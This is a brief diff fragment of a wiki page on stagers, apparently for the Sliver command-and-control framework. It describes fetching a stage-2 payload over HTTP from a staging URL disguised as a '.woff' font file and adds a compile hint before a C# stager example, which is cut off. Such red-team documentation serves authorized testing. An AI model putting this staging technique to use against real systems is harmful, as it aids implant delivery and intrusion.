RakhithJK/BishopFox-sliver-wiki/Stagers.md

 As a result, if you want to implement your own stager to fetch a stage 2 payload via HTTP, you need to query a URL that looks like this: `http://SLIVER-SERVER:STAGING-PORT/whatever.woff`.

-Here is a C# example of a custom HTTP stager:
+Here is a C# example of a custom HTTP stager, make sure to compile the C# code for the correct CPU architecture e.g. `/platform:x64`:

 ```csharp
 using System;